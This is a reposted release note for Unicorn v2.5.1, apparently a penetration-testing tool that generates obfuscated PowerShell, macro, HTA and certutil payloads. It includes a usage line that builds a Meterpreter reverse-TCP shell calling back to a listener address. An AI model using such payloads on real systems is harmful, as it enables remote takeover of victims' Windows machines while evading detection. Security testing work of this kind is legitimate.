Magic Unicorn Attack Vector v2.5.1 – PowerShell downgrade attack and exploitation tool.

Changelog unicorn v2.5.1:
* minor string format cleanup
* pep8 formatting

version 2.5
* complete rehaul on macro injection – adds heavy obfuscation through the entire codebase
* changed generate_random_strings to remove any digits – this was due to macro strings not supporting numeric values.startswith()
* code improvements and efficiency in vba code

version 2.4.3
* fixed macro injection with new obfuscated method
* added noprofile to command when using macro injection
* changed AutoOpen to Auto_Open
* fixed instructions to reflect

Unicorn is a PowerShell injection tool that uses Matthew Graeber's attack, expanded to automatically downgrade the process if a 64-bit platform is detected. This ensures that a payload can be delivered with just one set of shellcode instructions. It will work on any version of Windows with PowerShell installed. Simply copy and paste the output and wait for the shells.

Requirements:
+ Metasploit Framework

Attack Options:
+ POWERSHELL ATTACK INSTRUCTIONS
+ MACRO ATTACK INSTRUCTIONS
+ HTA ATTACK INSTRUCTIONS
+ CERTUTIL ATTACK INSTRUCTIONS
+ Custom PS1 Attack Instructions

Usage:

git clone https://github.com/trustedsec/unicorn && cd unicorn
python unicorn.py --help

Update:
cd unicorn
git pull origin master

Example use:
python unicorn.py payload reverse_ipaddr port
Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443

Source: TrustedSec | https://www.trustedsec.com/

Source: Security List Network™ @ February 23, 2017 at 07:13PM